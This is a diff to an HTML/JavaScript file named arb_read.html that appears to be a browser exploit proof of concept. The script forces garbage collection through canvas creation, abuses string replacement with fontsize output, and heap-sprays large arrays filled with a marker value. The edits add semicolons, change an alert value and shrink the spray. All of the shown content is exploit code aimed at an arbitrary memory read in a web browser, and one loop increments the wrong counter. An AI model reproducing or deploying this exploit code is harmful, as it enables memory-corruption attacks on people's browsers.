--- a/arb_read.html
+++ b/arb_read.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start with uint8 value:0xA4A");
+alert("start with uint8 value:0xAA");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -43,20 +43,20 @@ arr[i] = c.fontsize(1);
 }
 var s1 = c.fontsize(1) ;
 x.replace(/\d/g, s1);
-c = ''
+c = '';
 alert("ok");
- var spray=0
+ var spray=0;
 if (1) {
-    var s_size = 0x10000
-    var cnt = (s_size-0x14)/8
-    spray = new Array(0x1000/2)
+    var s_size = 0x10000;
+    var cnt = (s_size-0x14)/8;
+    spray = new Array(0x10/2);
     for (var i=0; i<spray.length; i++) {
-        spray[i] = new Array(cnt)
+        spray[i] = new Array(cnt);
     }
-    alert('ok2')
+    alert('ok2');
     for (var i=0; i<spray.length; i++) {
         for (var j=0; j<cnt; i+=0x10) {
-            spray[i][j] = 0x666
+            spray[i][j] = 0x666;
         }
     }
 
